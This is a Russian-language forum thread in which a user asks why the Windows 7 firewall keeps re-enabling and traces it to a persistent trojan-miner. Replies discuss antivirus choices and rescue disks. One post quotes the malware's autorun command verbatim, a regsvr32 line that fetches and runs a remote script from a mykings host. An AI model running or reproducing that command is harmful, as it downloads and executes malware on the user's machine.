Брандмауэр Windows 7 сам включается

[Antonych85]

Всем привет. На борту моего компьютера Windows 7 x64. Установлен антивирусник Avast Internet Security 2015, базы определения вирусов обновляются раз в 4 часа. Встроенный Брандмауэр Windows 7 отключил через панель управления/администрирование/службы, сразу после установки, т.к. в антивируснике есть свой фаерволл. Но с недавних пор этот Брандмауэр стал включаться сам по себе. Я его отключу, он опять включается. Как его прибить совсем, чтобы самопроизвольно не включался вновь?

[Zagadnik]

Отключить в настройках сетевого соединения.
Извиняюсь, ступил по старой памяти. Спать пора.

[Antonych85]

Понял причину:
В автозагрузке постоянно прописываются js.mykings 280. Т.е. действует какой-то троян. И это еще не самый опасный троян, по сравнению с вредоносным шифровальщиком WannaCry. Тем не менее, постоянно запускающийся Брандмауэр и эти две точки автозагрузки буду искать способ как-то вырубить. А может и переустановка винды.

[Lesnik75]

Цитата (Antonych85) »

Установлен антивирусник Avast

Цитата (Antonych85) »

действует какой-то троян

И почему я не удивлен? ))

[Zagadnik]

Lesnik75
Ещё грустнее от того, что AVG теперь это тот же самый Avast...

[Smirnoff]

Цитата (Lesnik75) »

почему я не удивлен?

Я нисколько не удивлюсь, когда у него Avast заблокирует загрузку винды после (и именно из-за... ) удаления заразы - был уже в моей практике прецедент...


Добавлено через 6 минут

Цитата (Zagadnik) »

AVG теперь это тот же самый Avast...

Пару лет назад это ещё были два разных "продукта"; однако у клиентов единственное проявление "эффективности" заключалось в регулярном удалении файлика 1cestart.exe (лицензионного вусмерть, Ага ), а вот когда дирша открыла "документ" вида "бла-бла-бла..бла-бла-бла.doc.vbs" (шифровальщик, к тому моменту известный и детектируемый Dr.Web уже более шести месяцев, во! ) AVG даже не вякнул, пакость этакая...

[Antonych85]

Еще скажу, Avast с 4 по 9 мая отлавливал файлы item.dat и test[1].dat. а в планировщике появилось задание mysa. В автозагрузке - start и start1, ведущие по ссылке на js.mykings.280. отключаю их из автозагрузки но они вновь включаются.
Ни Доктор Веб Курейт, ни Аваст Интернет Секьюрити не обнаруживают хоть какую-то зацепку, при сканировании. AVZ тоже ничего не обнаружил.

[zl0dey4eg]

Цитата (Antonych85) »

отключаю их из автозагрузки но они вновь включаются.

и так будет бесконечно, пока не ...
1. очистишь систему от говён из другой ОС (LiceCD DrWeb или Касперского)
2. не поставишь нормальный антивирь

[Antonych85]

Нормальный антивирь это какой еще? И Авиру пробовал - они банят периодически активацию (XP), и Касперский (w98) в середине нулевых стоял - тормозил систему, и Панда (XP), которую вообще посоветовали снести. и самый нормальный по состоянию на 2004 год был др Веб со спайдером (на Windows 98).

[zl0dey4eg]

Цитата (Antonych85) »

Нормальный антивирь это какой еще? И Авиру пробовал - они банят периодически активацию (XP), и Касперский (w98) в середине нулевых стоял - тормозил систему, и Панда (XP), которую вообще посоветовали снести. и самый нормальный по состоянию на 2004 год был др Веб со спайдером (на Windows 98).

Вас в поисковиках забанили?

Набираем - "топовый антивирус" и радуемся

[Antonych85]

Набрал - первый результат это Касперский, затем посмотрел рейтинги, первые места Каспер занимает. Как? С ним у меня 98-я винда грузилась 10 минут на Селероне 2400 с ОЗУ 256 мб. Без него 4 минуты. О_о.

[garniv]

Antonych85
Вам скорость загрузки Винды важна или защищенность от большей части зловредов? Если первое - то сидите без антивируса, это самый быстрый вариант.

[zl0dey4eg]

Цитата (Antonych85) »

Набрал - первый результат это Касперский, затем посмотрел рейтинги, первые места Каспер занимает. Как? С ним у меня 98-я винда грузилась 10 минут на Селероне 2400 с ОЗУ 256 мб. Без него 4 минуты. О_о.

Вы до сих пор на селероне и на 98 винде?!?

Не хочу разрушать Ваш мирок, но ... сейчас 2017 год!!! В ходу 4х ядерные CPU, 8-16Гб оперативки и очень быстрые SSD.

PS: чуть не забыл, сменилось уже 7 поколений Windows!!!

PPS: и linux стал вполне себе user friendly, и его можно без антивируса юзать

[Antonych85]

Да не. У меня сейчас 2500К, и 8 гиг оперативки, и Винда 7 64 бита. Конечно сменить не мешало бы, но кризис этот... Железки в цене выросли. Сейчас выяснилось вот что, в планировщике Mysa. item.dat снес, но regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll прописался в автозагрузке в виде трех прог косящих под проги винды, походу всерьез, причем эти майнер и бэкдор, говорят, вновь появляются на свежеустановленной системе, даже формат С не помогает.
Прибивать автозагрузку бесполезно, активируются вновь, а вот снесеный item.dat не появляется больше.
Попробую MALWAREBYTES прогнать, антивирусы ничего не находят - молчат, даже др.Веб курейт, который самый нормальный был.

Добавлено через 2 минуты

Цитата (garniv) »

Antonych85
Вам скорость загрузки Винды важна или защищенность от большей части зловредов? Если первое - то сидите без антивируса, это самый быстрый вариант.

Мой знакомый вообще без какого-либо антивируса сидит, но не скидывает и не хранит ничего важного на том компе, зато игрушки и система ууух летают... Все ненужные порты он просто закрыл командной строкой - программист по призванию. Но я все же считаю, что антивирь должен быть, все равно какая-никакая защита, хотя бы от старых вирусов.

[ladir]

Ваш вопрос схож с моей проблемой.
Только у меня ОС WinXP.

Получилось ли у Вас победить данный зловред и каким образом?

[zl0dey4eg]

Цитата (ladir) »

Получилось ли у Вас победить данный зловред и каким образом?

Есть два 100% способа победить любой (кроме шифровальщика) вирус.

1. Kaspersky Rescue Disk (Free)
2. Dr.Web LiveDisk (free)

[ladir]

Уточните каким образом у Вас проявлялась активность данного вируса.